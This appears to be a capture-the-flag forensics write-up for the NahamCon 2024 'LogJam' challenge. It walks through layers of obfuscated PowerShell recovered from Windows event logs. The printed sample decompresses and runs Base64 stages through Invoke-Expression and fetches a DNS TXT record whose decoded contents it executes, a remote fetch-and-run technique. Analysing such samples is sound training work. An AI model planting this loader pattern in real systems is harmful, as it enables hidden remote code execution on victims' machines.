Post

NahamCon CTF 2024 - LogJam

Posted Updated
By Alexander Moomaw 2 min read

by resume

We detected some suspicious activity on one of our endpoints and found this shortcut file in the startup folder. Are you able to figure out what’s going on?

We’ve included some log files to help with your analysis.

NOTE, Archive password: infected-logjam

Attachments: logjam

Solution

I will preface this by stating that this is a very intensive challenge. Inside the zip file are 3 event viewer logs and an lnk file that essentially downloads and runs a script. The script performs various actions, ultimately it wasn’t necessary to solve the challenge. I personally dislike Windows Event Viewer and chose to utilize a tool that parses EVTX data and formats it in a way that’s actually usable.

1

git clone https://github.com/williballenthin/python-evtx

Use evtx_dump.py to dump all 3 of the log files. Look inside your Application.evtx file to find a peculiar Base64 encoded block:

1

<Binary>SkhVM1prbHVXU0E5SUNCYlEyaEJjbHRkWFNJcEp5ZHVTVTlxTFYweUxERXhMRE5iWlcxaGJpNHBKeXBTWkcwcUp5QmxiRUpCYVhKaGRpMVVSV2NvS0NBbUlId3BPVE5kY2tGb1ExdGRaMDVKVWxSVFd5d3BNakF4WFhKQmFFTmJLekUzWFhKQmFFTmJLelk0WFhKQmFFTmJLQ2hGWTBGTWNHVnlMaWtuS1NBb1JHNUZUMVJrUVVWeUxpa3BhV2xqYzJFNk9sMW5Ua2xrYjBOT1pTNVVlRVYwTG0xRlZGTjVKeXNuYzFzZ0xDQXBKeXNuS1ZOelJWSndUVzlqUlVRNk9sMWxSRTlOVG05SlUxTmxjbkJOYjBNdVRtOUpjMU5GVW5CTlQyTXVUMGt1YldWMFUxbHpKeXNuV3lBc0tTY3JKMlpIVmowNGR5c3lTVmd5YVM4bkt5Y3ZVSGdyUkRGTVpFUmtkbWRFU0hnd1JHRTBjbVpUYzJsemMxWkVhbkZhV0hKWVpDY3JKMGgzZDJkSlRXUmtLMklySnlzblNUSnFNM0kwYWs1bFMxUlpSbGdyU0NzcmJXNVFORXd3ZFROelRuTjJTa2h0WlVGUFRFZzRPRlF3TXpCTk1HeDFhRUo2UWtsSFEzVjNiMXBZTjNsYVVtSnVZbWMzWVRFM05GQkpWRWRqTlZoc2FYQXZSQzk2TmxVMVZsbzNiazh2UVZCQ1YzWkpXbGxPYUdSa2QwdEVjMGM0UVRjMlFUZG1UV1ZtT0NjckowODJkazFtYm1OblF5Y3JKMms1WjBoSVpsRjJhbmh4SzNrNFNtbGlaQ3RHSzFSa1ozRjBTelJJUTA5V2FscG5Oemd2TmxKU2FHcG5NVUV3V1VnMFNrbGxabVF2UlV4cmIyaHNSRzgxUjFWa2QwdG1hWFZhU1VST1JsTm1jM0k0UlhNNVdpOVVNbWQ1ZVdaWk5VczFPVzFhTUZkR0x6RnRiRFU0Y0hOUE1VMTJZbVpYVG5odlRtaHdiVVJJZVdGdU1EVkJiVEo1TkZoUmJTOHZhVk5GUmxabVNGcEZMMDltT0dwUVozWkZVRWxtU2l0YWQyMU1SMDVsVmtOVlFqTm9UVXRqTlc0M1kxQTNNVE5yZWxKNEwyRXpPVmRUVmxsQ0wyVkNjV3hqWkdzeVVVOVJWVE13TDFCRVpIQTVXV2t6VlROUlVtZzRkMmNyWlZwMUwxUXlXR05xZEVFbkt5Y3pSMXBSTTBGV1VWUndUelphY2pKcmRrTlNaMHRuVmxSeVRqZFFRVTVhWlM5U1JFSmpLMVk0SnlzblJXcEtXbWRMUTBWVVZEZHdSbkJuVjNwdFlVTjRjbmR4T0RKRVdGTk9UbG92UmxKYVRTY3JKM0ZFYVVOeE1rSjFiR0ZSWkdKdlYwRnZZU2NySjBnbkt5ZHVNRVZWT1ZWRU5sRm9ja1pQVVZKMWRURjVhSEl6YkZSU1VHTnlOWE5xV1RReU9HNHpjeTkwTlRZMU5FOHZhVVpQY25ablpXZEtWVkZHUzJaYU4xSjFXVUZSVWpGQ1VGSmhhQzlVYTNCM1pGRjNVRGRhSnlzblJEVklVVE55UlNjckowZDRKeXNuTDB0QldrNUhTRUZWT1V0RFNrSnBaMnhIV1V4cmFYRXhlRlJHTDJsTVdIVXdLMnREZVdKbFNHRm9kREoxTDNONWNUQjZTMnBsVFc0MWRrOUpZblo1S3padGNuUTNMemh4YkZSamJURW5LeWN5UTBzeGRHOXRiazVCWWl0aldEWnpiSEJrWVRKamJTOTBhMFphWmxaaGFsQXZVVWRDWVd4VGFFd3JiemgxWlM5VVFrUnBSRGxoSzA1cmVDOVdNalpQTjJOcVZUVmFlQ3M1U0ZjeUp5c25hV1V6ZVNjckowWlRhVmhMTmtNNFZIUkxlR3NuS3lkVU5FVTVaazFWSnlzblMwcG5TVTVTYURNeWRWZFdjaWNySjBwWUp5c25UR2g1YVRKUVFVbHJVVXBEYVU0eFYxVkZjVUZHWlM5MWJHcFZPRXBRY2pSS1lrbHhaa1JwWjFOa1dsSkRiRU5WUTJad1NFTnlhRlZhV1Njckp6Um9lVFJGVTI1cVZrRjBhV1pDVlZSaUwyTm5hbVJSYlhVdmFsZHBiaXRDTWxkaU5UUW5LeWRRVFVobk9FOTVjeWNySjNGMkt5Y3JKeTlZWW5OdUp5c25OamRJYVRWRk0waGpSMkpVTnpobWRIQk1hRUZvZFZkUk4wa3daVU5XWnpWd1IwNTNWbk5LWldsRVpXcElMM1pZWkV0b1ZWVmtTbU5MWWt4aEwxbDRPRzFOUmxKeFZ6VlhjREZSYUhwemVsVXlXR3hWY1UwM2JuQmFWa2Q2YzNOdE5UVmlOR015UWpWSlFpY3JKMUZTV2xodVQybEZlbll2Y2pWcGJsRjFiRWt6VjJGR1REQnBXQ2NySjBscU1rcFJOMk40VDFNeFVGaGtURTlGVm1sUFNYRkxXVzg1TTBGWVNVUTRVRkVyTWxCRk5DY3JKM01uS3ljNVluQlNWbVptUjFZZ0tFY25LeWRPSnlzblNTY3JKMUowY3pRMlpYTmhKeXNuUWsxUGNrWTZPbDFVY21WMlRtOURXMTFOUVVWU1ZITlpjazl0WlUwdVQya25LeWN1YldWVWMzbHpXeWh0UVVWeWRITmxWRUZNUm1Wa0xtNVBKeXNuU1ZOelJYSlFiVTlqTG05cExtMUZWRk41SnlzbmN5QWdkR05GYWtKUExYZGxUaUFvSUNoU1JXUkJaWEpOWVdWU2RGTXViMmt1YldWVWMza25LeWRUSUNCMFkwVnFRazh0ZDJWT0lDZ2diazlKYzNORlVuQllSUzFsUzA5V1Rta25LQ0k3SUZ0aGNsSmhXVjA2T25KbGRtVnlVMlVvSUNnZ0lGWkJja2xCUW14bElDZ25WVGNuS3lkbVNVNVpKeWtnTFhaQktTQXBPeTRvSUNSV1pYSmlUMU5sY0hKRlprVlNaVzVqUlM1MFQxTlVVbWx1WnlncFd6RXNNMTBySjNnbkxVcHZhVTRuSnlrb0lDMUtiMGxPS0NBZ1ZrRnlTVUZDYkdVZ0tDZFZOeWNySjJaSlRsa25LU0F0ZGtFcElDa2dDZz09</Binary>

Decode the block. This is where the intensive part begins:

1
2

$u7fInY =  [ChAr[]]")''nIOj-]2,11,3[eman.)'*Rdm*' elBAirav-TEg(( & |)93]rAhC[]gNIRTS[,)201]rAhC[+17]rAhC[+68]rAhC[((EcALper.)') (DnEOTdAEr.))iicsa::]gNIdoCNe.TxEt.mETSy'+'s[ , )'+')SsERpMocED::]eDOMNoISSerpMoC.NoIsSERpMOc.OI.metSYs'+'[ ,)'+'fGV=8w+2IX2i/'+'/Px+D1LdDdvgDHx0Da4rfSsissVDjqZXrXd'+'HwwgIMdd+b+'+'I2j3r4jNeKTYFX+H++mnP4L0u3sNsvJHmeAOLH88T030M0luhBzBIGCuwoZX7yZRbnbg7a174PITGc5Xlip/D/z6U5VZ7nO/APBWvIZYNhddwKDsG8A76A7fMef8'+'O6vMfncgC'+'i9gHHfQvjxq+y8Jibd+F+TdgqtK4HCOVjZg78/6RRhjg1A0YH4JIefd/ELkohlDo5GUdwKfiuZIDNFSfsr8Es9Z/T2gyyfY5K59mZ0WF/1ml58psO1MvbfWNxoNhpmDHyan05Am2y4XQm//iSEFVfHZE/Of8jPgvEPIfJ+ZwmLGNeVCUB3hMKc5n7cP713kzRx/a39WSVYB/eBqlcdk2QOQU30/PDdp9Yi3U3QRh8wg+eZu/T2XcjtA'+'3GZQ3AVQTpO6Zr2kvCRgKgVTrN7PANZe/RDBc+V8'+'EjJZgKCETT7pFpgWzmaCxrwq82DXSNNZ/FRZM'+'qDiCq2BulaQdboWAoa'+'H'+'n0EU9UD6QhrFOQRuu1yhr3lTRPcr5sjY428n3s/t5654O/iFOrvgegJUQFKfZ7RuYAQR1BPRah/TkpwdQwP7Z'+'D5HQ3rE'+'Gx'+'/KAZNGHAU9KCJBiglGYLkiq1xTF/iLXu0+kCybeHaht2u/syq0zKjeMn5vOIbvy+6mrt7/8qlTcm1'+'2CK1tomnNAb+cX6slpda2cm/tkFZfVajP/QGBalShL+o8ue/TBDiD9a+Nkx/V26O7cjU5Zx+9HW2'+'ie3y'+'FSiXK6C8TtKxk'+'T4E9fMU'+'KJgINRh32uWVr'+'JX'+'Lhyi2PAIkQJCiN1WUEqAFe/uljU8JPr4JbIqfDigSdZRClCUCfpHCrhUZY'+'4hy4ESnjVAtifBUTb/cgjdQmu/jWin+B2Wb54'+'PMHg8Oys'+'qv+'+'/Xbsn'+'67Hi5E3HcGbT78ftpLhAhuWQ7I0eCVg5pGNwVsJeiDejH/vXdKhUUdJcKbLa/Yx8mMFRqW5Wp1QhzszU2XlUqM7npZVGzssm55b4c2B5IB'+'QRZXnOiEzv/r5inQulI3WaFL0iX'+'Ij2JQ7cxOS1PXdLOEViOIqKYo93AXID8PQ+2PE4'+'s'+'9bpRVffGV (G'+'N'+'I'+'Rts46esa'+'BMOrF::]TrevNoC[]MAERTsYrOmeM.Oi'+'.meTsys[(mAErtseTALFed.nO'+'ISsErPmOc.oi.mETSy'+'s  tcEjBO-weN ( (REdAerMaeRtS.oi.meTsy'+'S  tcEjBO-weN ( nOIssERpXE-eKOVNi'("; [arRaY]::reverSe( (  VArIABle ('U7'+'fINY') -vA) );.( $VerbOSeprEfERencE.tOSTRing()[1,3]+'x'-JoiN'')( -JoIN(  VArIABle ('U7'+'fINY') -vA) )

Write-Output of that variable $u7fInY

1

('iNVOKe-EXpREssIOn ( New-OBjEct  S'+'ysTem.io.StReaMreAdER( ( New-OBjEct  s'+'ySTEm.io.cOmPrEsSI'+'On.deFLATestrEAm([sysTem.'+'iO.MemOrYsTREAM][CoNverT]::FrOMB'+'ase64stR'+'I'+'N'+'G( VGffVRpb9'+'s'+'4EP2+QP8DIXA39oYKqIOiVEOLdXP1SOxc7QJ2jI'+'Xi0LFaW3IluQni5r/vzEiOnXZRQ'+'BI5B2c4b55msszGVZpn7MqUlX2UzszhQ1pW5WqRFMm8xY/aLbKcJdUUhKdXv/HjeDieJsVwNGp5gVCe0I7QWuhAhLptf87TbGcH3E5iH76'+'nsbX/'+'+vq'+'syO8gHMP'+'45bW2B+niWj/umQdjgc/bTUBfitAVjnSE4yh4'+'YZUhrCHpfCUClCRZdSgiDfqIbJ4rPJ8Ujlu/eFAqEUW1NiCJQkIAP2iyhL'+'XJ'+'rVWu23hRNIgJK'+'UMf9E4T'+'kxKtT8C6KXiSF'+'y3ei'+'2WH9+xZ5Ujc7O62V/xkN+a9DiDBT/eu8o+LhSlaBGQ/PjaVfZFkt/mc2adpls6Xc+bANnmot1KC2'+'1mcTlq8/7trm6+yvbIOv5nMejKz0qys/u2thaHebyCk+0uXLi/FTx1qikLYGlgiBJCK9UAHGNZAK/'+'xG'+'Er3QH5D'+'Z7PwQdwpkT/haRPB1RQAYuR7ZfKFQUJgegvrOFi/O4565t/s3n824Yjs5rcPRTl3rhy1uuRQOFrhQ6DU9UE0n'+'H'+'aoAWobdQaluB2qCiDq'+'MZRF/ZNNSXD28qwrxCamzWgpFp7TTECKgZJjE'+'8V+cBDR/eZNAP7NrTVgKgRCvk2rZ6OpTQVA3QZG3'+'AtjcX2T/uZe+gw8hRQ3U3iY9pdDP/03UQOQ2kdclqBe/BYVSW93a/xRzk317Pc7n5cKMh3BUCVeNGLmwZ+JfIPEvgPj8fO/EZHfVFESi//mQX4y2mA50nayHDmphNoxNWfbvM1Osp85lm1/FW0Zm95K5Yfyyg2T/Z9sE8rsfSFNDIZuifKwdUG5oDlhokLE/dfeIJ4HY0A1gjhRR6/87gZjVOCH4KtqgdT+F+dbiJ8y+qxjvQfHHg9i'+'CgcnfMv6O'+'8feMf7A67A8GsDKwddhNYZIvWBPA/On7ZV5U6z/D/pilX5cGTIP471a7gbnbRZy7XZowuCGIBzBhul0M030T88HLOAemHJvsNs3u0L4Pnm++H+XFYTKeNj4r3j2I'+'+b+ddMIgwwH'+'dXrXZqjDVssisSfr4aD0xHDgvdDdL1D+xP/'+'/i2XI2+w8=VGf'+'), ['+'sYStem.IO.cOMpRESsIoN.CoMpreSSIoNMODe]::DEcoMpREsS)'+') , [s'+'ySTEm.tExT.eNCodINg]::ascii)).rEAdTOEnD( )').repLAcE(([ChAr]86+[ChAr]71+[ChAr]102),[STRINg][ChAr]39)| & ((gET-variABle '*mdR*').name[3,11,2]-jOIn'')

I cleaned up the Base64 message, got rid of the VGf at the beginning and end, inflated the message, and got a new block of code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

function Test-FileExists{param($F)(Test-Path$F)}
$G=[char[]](36,53,71,77,76,87)-join''
$L=4
$M="C:\Program Files\7-Zip\7z.exe"
$H=[char[]](40,82,101,115,111,108,118,101,45,68,110,115,78,97,109,101,32,34,97,112,112,108,105,99,97,116,105,111,110,46,101,118,116,120,46,122,105,112,34,32,45,84,121,112,101,32,116,120,116)-join''
for($N=0;$N-lt100;$N++){$L+=$N;$M=$M.ToUpper()}
$O=Get-Random -Minimum 1 -Maximum 100
$P=if($O%2-eq0){"Even"}else{"Odd"}
$J=[char[]](105,102,32,40,36,53,71,77,76,87,32,45,109,97,116,99,104,32,39,94,91,45,65,45,90,97,45,122,97,45,122,48,45,57,43,47,93,42,61,123,48,44,51,125,36,39,41)-join''
$Q=New-Object 'object[]'100
$K=[char[]](32,123,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,91,83,121,115,116,101,109,46,67,111,110,118,101,114,116,93,58,58,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,40,36,53,71,77,76,87,41,41,32,124,32,73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110,32,125)-join''
$CV=$env:comspec[4,15,25] -join ''
for($R=0;$R-lt$Q.Length;$R++){$Q[$R]=Get-Random}
function Get-ProcessOwner{param($S)$T=Get-Process -Name $S;}
$W=Get-Process
$I=[char[]](32,124,32,70,111,114,69,97,99,104,45,79,98,106,101,99,116,32,123,32,36,95,46,83,116,114,105,110,103,115,32,125,41,59)-join''
while($L -gt $N){$GZ="$G=$H $I $J $K"; & $CV $GZ; break}
$V=$V|Sort-Object -Unique
$Z=@()
for($AA=0;$AA-lt10;$AA++){$Z+=$AA}
$AB=$Z|Sort-Object -Descending
$AC=$AB|ForEach-Object{$AD=$_;if ($AD -gt 5) {return"fizz"} else {return"fizzbuzz"}} *>$null

It’s a mess. This is the most important section:

1

$GZ="$G=$H $I $J $K";

1
2
3

Write-Output $GZ

Output: Resolve-DnsName "application.evtx.zip" -type Text

Resolving that DNS name returns the flag:

1
2
3
4
5
6
7
8

Resolve-DnsName 'application.evtx.zip' -Type txt

Name                                     Type   TTL   Section    Strings
----                                     ----   ---   -------    -------
application.evtx.zip                     TXT    300   Answer     {Y2FsYy5leGUKI1pteGhaM3RqWVRoak1qZzRaREV6
                                                                 T1RVMk9EazFOemN5T0RkaVlUTmlaakkyTkRsaFpIM
                                                                 D0K}


1
2

calc.exe
#ZmxhZ3tjYThjMjg4ZDEzOTU2ODk1NzcyODdiYTNiZjI2NDlhZH0=

1

flag{ca8c288d1395689577287ba3bf2649ad}
Writeup
ctf forensics nahamcon2024
This post is licensed under CC BY 4.0 by the author.